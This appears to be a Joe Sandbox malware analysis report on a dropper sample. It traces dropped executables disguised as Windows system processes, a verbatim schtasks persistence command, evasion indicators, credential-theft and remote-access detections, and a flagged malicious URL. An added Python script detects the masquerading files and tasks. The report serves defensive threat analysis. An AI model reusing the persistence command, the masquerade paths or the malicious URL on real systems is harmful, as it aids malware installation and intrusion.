          Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
          Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
          Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
          Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
          Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
          Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
          Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
          Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
          Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
          Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
          Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
          Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
          Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
          Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
          Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
          Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
          Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
          Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
          Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
          Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
          Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
          Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
          Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
          Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
          Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
          Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32
          Source: Window Recorder Window detected: More than 3 window changes detected
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exe Directory created: C:\Program Files\Windows Defender Advanced Threat Protection\services.exe
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exe Directory created: C:\Program Files\Windows Defender Advanced Threat Protection\c5b4cb5e9653cc
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exe Directory created: C:\Program Files\Windows Sidebar\WmiPrvSE.exe
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exe Directory created: C:\Program Files\Windows Sidebar\24dbde2999530e
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exe Directory created: C:\Program Files\MSBuild\bdoMPjmZJHMIJMdqEctkzcHPTiy.exe
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exe Directory created: C:\Program Files\MSBuild\48b6e448d1d68f
          Source: file.exe Static file information: File size 2771800 > 1048576
          Source: file.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
          Source: file.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
          Source: file.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
          Source: file.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: file.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
          Source: file.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
          Source: file.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
          Source: file.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: file.exe
          Source: Binary string: \Desktop\DCLIB-master\obj\Debug\DCLIB.pdbU.o. a._CorDllMainmscoree.dll source: comProviderServer.exe, 00000007.00000002.1422929652.000000001BD60000.00000004.08000000.00040000.00000000.sdmp
          Source: Binary string: \Desktop\DCLIB-master\obj\Debug\DCLIB.pdb source: comProviderServer.exe, 00000007.00000002.1422929652.000000001BD60000.00000004.08000000.00040000.00000000.sdmp
          Source: file.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
          Source: file.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
          Source: file.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
          Source: file.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
          Source: file.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
          Source: C:\Users\user\Desktop\file.exe File created: C:\reviewDriverIntosessionnet\__tmp_rar_sfx_access_check_5026703
          Source: file.exe Static PE information: section name: .didat
          Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00B9E28C push eax; ret 1_2_00B9E2AA
          Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00B9ED46 push ecx; ret 1_2_00B9ED59
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exe Code function: 7_2_00007FFAAC3F00BD pushad ; iretd 7_2_00007FFAAC3F00C1
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exe Code function: 7_2_00007FFAAC3F7DA4 push edx; retf 7_2_00007FFAAC3F7DA5

          Persistence and Installation Behavior

          Source: C:\reviewDriverIntosessionnet\comProviderServer.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create (logged 39 times in the raw report)
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exe File created: C:\Program Files\Windows Defender Advanced Threat Protection\services.exe
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exe File created: C:\Users\Public\Downloads\explorer.exe
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exe File created: C:\reviewDriverIntosessionnet\spoolsv.exe
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exe File created: C:\Program Files (x86)\Microsoft.NET\RedistList\WmiPrvSE.exe
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exe File created: C:\Users\jones\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\bdoMPjmZJHMIJMdqEctkzcHPTiy.exe
          Source: C:\Users\user\Desktop\file.exe File created: C:\reviewDriverIntosessionnet\comProviderServer.exe
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exe File created: C:\Program Files\Windows Sidebar\WmiPrvSE.exe
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exe File created: C:\Program Files (x86)\Windows Media Player\Network Sharing\bdoMPjmZJHMIJMdqEctkzcHPTiy.exe
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exe File created: C:\Recovery\bdoMPjmZJHMIJMdqEctkzcHPTiy.exe
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exe File created: C:\Windows\ELAMBKUP\StartMenuExperienceHost.exe
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exe File created: C:\Recovery\WmiPrvSE.exe
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exe File created: C:\reviewDriverIntosessionnet\bdoMPjmZJHMIJMdqEctkzcHPTiy.exe
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exe File created: C:\Program Files\MSBuild\bdoMPjmZJHMIJMdqEctkzcHPTiy.exe
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exe File created: C:\Users\user\wscript.exe
          (the services.exe, explorer.exe, spoolsv.exe, StartMenuExperienceHost.exe and wscript.exe drops are each listed twice in the raw report)

          Boot Survival

          Source: C:\reviewDriverIntosessionnet\comProviderServer.exe File created: C:\Users\user\wscript.exe
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "servicess" /sc MINUTE /mo 8 /tr "'C:\Program Files\Windows Defender Advanced Threat Protection\services.exe'" /f
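The two findings above, PE files dropped under benign system-process names and a schtasks.exe task that relaunches one of them every 8 minutes, share one triage question: is a binary called services.exe (or explorer.exe, WmiPrvSE.exe, ...) sitting in a directory Windows never installs it to? The script below is an added example, not part of the Joe Sandbox report or of the sample's own code. It applies that check to the dropped-file list and to the /tr target of the schtasks command line copied from this report. The expected-directory table (EXPECTED_DIRS), the function names classify, masquerades, parse_schtasks and triage_task, and the two benign control paths at the end of SAMPLE_DROPS are assumptions constructed for the example.

```python
"""Triage helper: does a dropped file, or the action of a scheduled task,
carry a Windows system-process name outside the directory Windows ships it
in? This is the logic behind the "Files With System Process Name In
Unsuspected Locations" finding and the Boot Survival schtasks.exe entry.

Added example (not Joe Sandbox or DCRat code). EXPECTED_DIRS is an assumed,
deliberately short table for illustration; a production rule needs a fuller
inventory and %SystemRoot% handling.
"""
import ntpath
import re

# Assumed expected parent directories (lowercase, no trailing backslash).
EXPECTED_DIRS = {
    "services.exe": {r"c:\windows\system32"},
    "spoolsv.exe": {r"c:\windows\system32"},
    "explorer.exe": {r"c:\windows"},
    "wmiprvse.exe": {r"c:\windows\system32\wbem", r"c:\windows\syswow64\wbem"},
    "wscript.exe": {r"c:\windows\system32", r"c:\windows\syswow64"},
    "startmenuexperiencehost.exe": {
        r"c:\windows\systemapps\microsoft.windows.startmenuexperiencehost_cw5n1h2txyewy"
    },
}


def classify(path: str) -> str:
    """Return 'masquerade' when the basename is a known system process name but
    the parent directory is not one Windows installs it to, 'expected' when it
    is, and 'not_system_name' for anything else (e.g. the random-named drops)."""
    name = ntpath.basename(path).lower()
    if name not in EXPECTED_DIRS:
        return "not_system_name"
    parent = ntpath.dirname(path).lower().rstrip("\\")
    return "expected" if parent in EXPECTED_DIRS[name] else "masquerade"


def masquerades(paths) -> list:
    """Filter a list of dropped-file paths down to the masquerading ones."""
    return [p for p in paths if classify(p) == "masquerade"]


# A double-quoted argument is one token; anything else splits on whitespace.
_TOKEN = re.compile(r'"([^"]*)"|(\S+)')


def parse_schtasks(cmdline: str) -> dict:
    """Split a schtasks.exe command line into {switch: value_or_True}. The /tr
    value in the report wraps the path in an extra pair of single quotes; they
    are stripped so the path can be classified."""
    tokens = [quoted or bare for quoted, bare in _TOKEN.findall(cmdline)]
    args = {}
    i = 1  # tokens[0] is schtasks.exe itself
    while i < len(tokens):
        tok = tokens[i]
        if tok.startswith("/"):
            key = tok[1:].lower()
            if i + 1 < len(tokens) and not tokens[i + 1].startswith("/"):
                args[key] = tokens[i + 1]
                i += 2
                continue
            args[key] = True  # bare switch such as /create or /f
        i += 1
    if isinstance(args.get("tr"), str):
        args["tr"] = args["tr"].strip("'")
    return args


def triage_task(cmdline: str) -> dict:
    """Combine both checks for one 'schtasks.exe /create' command line."""
    args = parse_schtasks(cmdline)
    target = args.get("tr") if isinstance(args.get("tr"), str) else ""
    verdict = classify(target) if target else "no_action"
    interval = None
    if str(args.get("sc", "")).upper() == "MINUTE":
        interval = int(args.get("mo", 1))  # schtasks defaults /mo to 1
    return {
        "task_name": args.get("tn"),
        "target": target,
        "interval_minutes": interval,
        "verdict": verdict,
        "persistence": "create" in args and verdict == "masquerade",
    }


# Constructed sample input: the first eight paths are copied from the
# dropped-file list in this report; the last two are benign controls.
SAMPLE_DROPS = [
    r"C:\Program Files\Windows Defender Advanced Threat Protection\services.exe",
    r"C:\Users\Public\Downloads\explorer.exe",
    r"C:\reviewDriverIntosessionnet\spoolsv.exe",
    r"C:\Program Files (x86)\Microsoft.NET\RedistList\WmiPrvSE.exe",
    r"C:\Program Files\Windows Sidebar\WmiPrvSE.exe",
    r"C:\Windows\ELAMBKUP\StartMenuExperienceHost.exe",
    r"C:\Users\user\wscript.exe",
    r"C:\Program Files\MSBuild\bdoMPjmZJHMIJMdqEctkzcHPTiy.exe",
    r"C:\Windows\System32\services.exe",
    r"C:\Windows\explorer.exe",
]

# The Boot Survival command line from this report, verbatim.
SAMPLE_TASK = r"""schtasks.exe /create /tn "servicess" /sc MINUTE /mo 8 /tr "'C:\Program Files\Windows Defender Advanced Threat Protection\services.exe'" /f"""

if __name__ == "__main__":
    for p in SAMPLE_DROPS:
        print(f"{classify(p):16} {p}")
    print(triage_task(SAMPLE_TASK))
```

Run stand-alone it prints a verdict per dropped path (seven of the ten are masquerades, the random-named bdoMPjmZ... drop is not flagged by this rule and is left to the other signatures) and a dict for the task showing name "servicess", an 8-minute interval and a masquerading target, which is what makes the task a persistence mechanism rather than a one-off launch.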
          Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX (logged 5 times)
          Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exe Process information set: NOOPENFILEERRORBOX (logged 51 times)
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exe Memory allocated: 1090000 memory reserve | memory write watch
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exe Memory allocated: 1AC80000 memory reserve | memory write watch
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exe Thread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\wscript.exe Window found: window name: WSH-Timer (logged twice)
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exe Window / User API: threadDelayed 1298
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exe Window / User API: threadDelayed 1154
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exe TID: 7848 Thread sleep count: 1298 > 30
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exe TID: 7840 Thread sleep count: 1154 > 30
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exe TID: 7824 Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exe File Volume queried: C:\ FullSizeInformation
          Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00B8A5F4 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,1_2_00B8A5F4
          Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00B9B8E0 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,1_2_00B9B8E0
          Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00BAAAA8 FindFirstFileExA,1_2_00BAAAA8
          Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00B9DD72 VirtualQuery,GetSystemInfo,1_2_00B9DD72
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exe Thread delayed: delay time: 922337203685477
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exe File opened: C:\Users\user\AppData\Local\Temp
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exe File opened: C:\Users\user
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exe File opened: C:\Users\user\AppData\Local
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exe File opened: C:\Users\user\Documents\desktop.ini
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exe File opened: C:\Users\user\AppData
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exe File opened: C:\Users\user\Desktop\desktop.ini
          Source: file.exe, 00000001.00000003.1317844721.00000000031B5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Q
          Source: comProviderServer.exe, 00000007.00000002.1422323551.000000001BC9E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: dRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: file.exe, 00000001.00000002.1320608135.00000000031B5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}2
          Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node graph_1-24541
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exe Process information queried: ProcessInformation
          Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00BA866F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00BA866F
          Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00BA753D mov eax, dword ptr fs:[00000030h]1_2_00BA753D
          Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00BAB710 GetProcessHeap,1_2_00BAB710
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00B9F063 SetUnhandledExceptionFilter,1_2_00B9F063
          Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00B9F22B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_00B9F22B
          Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00BA866F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00BA866F
          Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00B9EF05 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00B9EF05
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeMemory allocated: page read and write | page guardJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\reviewDriverIntosessionnet\V50gFn.vbe" Jump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\reviewDriverIntosessionnet\file.vbs" Jump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\reviewDriverIntosessionnet\NRWB62aUrGQ.bat" "Jump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\reviewDriverIntosessionnet\comProviderServer.exe "C:\reviewDriverIntosessionnet\comProviderServer.exe" Jump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00B9ED5B cpuid 1_2_00B9ED5B
          Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoW,GetNumberFormatW,1_2_00B9A63C
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeQueries volume information: C:\reviewDriverIntosessionnet\comProviderServer.exe VolumeInformationJump to behavior
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00B9D5D4 GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,1_2_00B9D5D4
          Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00B8ACF5 GetVersionExW,1_2_00B8ACF5
          Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Stealing of Sensitive Information

          Source: Yara match | File source: 00000007.00000002.1397210421.0000000002E15000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000002.1397210421.0000000002C81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000002.1399409242.0000000012C8F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: Process Memory Space: comProviderServer.exe PID: 7800, type: MEMORYSTR

          Remote Access Functionality

          Source: Yara match | File source: 00000007.00000002.1397210421.0000000002E15000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000002.1397210421.0000000002C81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000002.1399409242.0000000012C8F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: Process Memory Space: comProviderServer.exe PID: 7800, type: MEMORYSTR
          Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
          Gather Victim Identity Information | Scripting (12) | Valid Accounts | Windows Management Instrumentation (11) | Scheduled Task/Job (1) | Process Injection (11) | Masquerading (233) | OS Credential Dumping | System Time Discovery (1) | Remote Services | Archive Collected Data (1) | Encrypted Channel (1) | Exfiltration Over Other Network Medium | Abuse Accessibility Features
          Credentials | Domains | Default Accounts | Command and Scripting Interpreter (2) | Scripting (12) | Scheduled Task/Job (1) | Disable or Modify Tools (1) | LSASS Memory | Security Software Discovery (21) | Remote Desktop Protocol | Data from Removable Media | Application Layer Protocol (1) | Exfiltration Over Bluetooth | Network Denial of Service
          Email Addresses | DNS Server | Domain Accounts | Scheduled Task/Job (1) | DLL Side-Loading (1) | DLL Side-Loading (1) | Virtualization/Sandbox Evasion (31) | Security Account Manager | Process Discovery (1) | SMB/Windows Admin Shares | Data from Network Shared Drive | Steganography | Automated Exfiltration | Data Encrypted for Impact
          Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | Process Injection (11) | NTDS | Virtualization/Sandbox Evasion (31) | Distributed Component Object Model | Input Capture | Protocol Impersonation | Traffic Duplication | Data Destruction
          Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | Deobfuscate/Decode Files or Information (1) | LSA Secrets | Application Window Discovery (1) | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
          Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | Obfuscated Files or Information (2) | Cached Domain Credentials | File and Directory Discovery (3) | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
          DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Software Packing (1) | DCSync | System Information Discovery (37) | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
          Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | DLL Side-Loading (1) | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          Behavior Graph ID: 1521601 | Sample: file.exe | Start date: 29/09/2024 | Architecture: WINDOWS | Score: 100
          Top-level signatures: Found malware configuration; Antivirus detection for dropped file; Antivirus / Scanner detection for submitted sample; 8 other signatures
          Process tree:
          file.exe (started)
            dropped: C:\...\comProviderServer.exe (PE32); C:\reviewDriverIntosessionnet\V50gFn.vbe (data)
            wscript.exe (started, 2 instances)
              signature: Windows Scripting host queries suspicious COM object (likely to drop second stage)
              cmd.exe (started)
                conhost.exe (started)
                comProviderServer.exe (started)
                  dropped: C:\reviewDriverIntosessionnet\spoolsv.exe (PE32); C:\...\bdoMPjmZJHMIJMdqEctkzcHPTiy.exe (PE32); C:\Windows\...\StartMenuExperienceHost.exe (PE32); 11 other malicious files
                  signatures: Antivirus detection for dropped file; Machine Learning detection for dropped file; Drops PE files to the user root directory; 3 other signatures
                  schtasks.exe (started, 3 instances); 27 other processes

          Source | Detection | Scanner | Label
          file.exe | 61% | ReversingLabs | ByteCode-MSIL.Trojan.Uztuby
          file.exe | 100% | Avira | VBS/Runner.VPG
          file.exe | 100% | Joe Sandbox ML |
          Source | Detection | Scanner | Label
          C:\Program Files (x86)\Windows Media Player\Network Sharing\bdoMPjmZJHMIJMdqEctkzcHPTiy.exe | 100% | Avira | HEUR/AGEN.1323984
          C:\Program Files (x86)\Windows Media Player\Network Sharing\bdoMPjmZJHMIJMdqEctkzcHPTiy.exe | 100% | Avira | HEUR/AGEN.1323984
          C:\reviewDriverIntosessionnet\spoolsv.exe | 100% | Avira | HEUR/AGEN.1323984
          C:\Users\user\AppData\Local\Temp\vEbYiTsQ2u.bat | 100% | Avira | BAT/Delbat.C
          C:\Users\Public\Downloads\explorer.exe | 100% | Avira | HEUR/AGEN.1323984
          C:\Program Files (x86)\Windows Media Player\Network Sharing\bdoMPjmZJHMIJMdqEctkzcHPTiy.exe | 100% | Avira | HEUR/AGEN.1323984
          C:\Program Files (x86)\Microsoft.NET\RedistList\WmiPrvSE.exe | 100% | Avira | HEUR/AGEN.1323984
          C:\Program Files (x86)\Windows Media Player\Network Sharing\bdoMPjmZJHMIJMdqEctkzcHPTiy.exe | 100% | Avira | HEUR/AGEN.1323984
          C:\Users\user\wscript.exe | 100% | Avira | HEUR/AGEN.1323984
          C:\reviewDriverIntosessionnet\V50gFn.vbe | 100% | Avira | VBS/Runner.VPG
          C:\Windows\ELAMBKUP\StartMenuExperienceHost.exe | 100% | Avira | HEUR/AGEN.1323984
          C:\Program Files (x86)\Microsoft.NET\RedistList\WmiPrvSE.exe | 100% | Avira | HEUR/AGEN.1323984
          C:\Program Files\Windows Defender Advanced Threat Protection\services.exe | 100% | Avira | HEUR/AGEN.1323984
          C:\Program Files (x86)\Windows Media Player\Network Sharing\bdoMPjmZJHMIJMdqEctkzcHPTiy.exe | 100% | Avira | HEUR/AGEN.1323984
          C:\reviewDriverIntosessionnet\comProviderServer.exe | 100% | Avira | HEUR/AGEN.1323984
          C:\Program Files (x86)\Microsoft.NET\RedistList\WmiPrvSE.exe | 100% | Avira | HEUR/AGEN.1323984
          C:\Program Files (x86)\Windows Media Player\Network Sharing\bdoMPjmZJHMIJMdqEctkzcHPTiy.exe | 100% | Joe Sandbox ML |
          C:\Program Files (x86)\Windows Media Player\Network Sharing\bdoMPjmZJHMIJMdqEctkzcHPTiy.exe | 100% | Joe Sandbox ML |
          C:\reviewDriverIntosessionnet\spoolsv.exe | 100% | Joe Sandbox ML |
          C:\Users\Public\Downloads\explorer.exe | 100% | Joe Sandbox ML |
          C:\Program Files (x86)\Windows Media Player\Network Sharing\bdoMPjmZJHMIJMdqEctkzcHPTiy.exe | 100% | Joe Sandbox ML |
          C:\Program Files (x86)\Microsoft.NET\RedistList\WmiPrvSE.exe | 100% | Joe Sandbox ML |
          C:\Program Files (x86)\Windows Media Player\Network Sharing\bdoMPjmZJHMIJMdqEctkzcHPTiy.exe | 100% | Joe Sandbox ML |
          C:\Users\user\wscript.exe | 100% | Joe Sandbox ML |
          C:\Windows\ELAMBKUP\StartMenuExperienceHost.exe | 100% | Joe Sandbox ML |
          C:\Program Files (x86)\Microsoft.NET\RedistList\WmiPrvSE.exe | 100% | Joe Sandbox ML |
          C:\Program Files\Windows Defender Advanced Threat Protection\services.exe | 100% | Joe Sandbox ML |
          C:\Program Files (x86)\Windows Media Player\Network Sharing\bdoMPjmZJHMIJMdqEctkzcHPTiy.exe | 100% | Joe Sandbox ML |
          C:\reviewDriverIntosessionnet\comProviderServer.exe | 100% | Joe Sandbox ML |
          C:\Program Files (x86)\Microsoft.NET\RedistList\WmiPrvSE.exe | 100% | Joe Sandbox ML |
          No Antivirus matches
          No Antivirus matches
          Source | Detection | Scanner | Label
          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe
          No contacted domains info
          Name | Malicious | Antivirus Detection | Reputation
          http://nezik.ru.swtest.ru/@=ETYmFWY1UWO | true | | unknown
          Name | Source | Malicious | Antivirus Detection | Reputation
          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | comProviderServer.exe, 00000007.00000002.1397210421.0000000002E15000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
          No contacted IP infos
            Joe Sandbox version:41.0.0 Charoite
            Analysis ID:1521601
            Start date and time:2024-09-29 01:00:08 +02:00
            Joe Sandbox product:CloudBasic
            Overall analysis duration:0h 8m 2s
            Hypervisor based Inspection enabled:false
            Report type:full
            Cookbook file name:default.jbs
            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
            Number of new started processes analysed:43
            Number of new started drivers analysed:0
            Number of existing processes analysed:0
            Number of existing drivers analysed:0
            Number of injected processes analysed:0
            Technologies:
            • HCA enabled
            • EGA enabled
            • AMSI enabled
            Analysis Mode:default
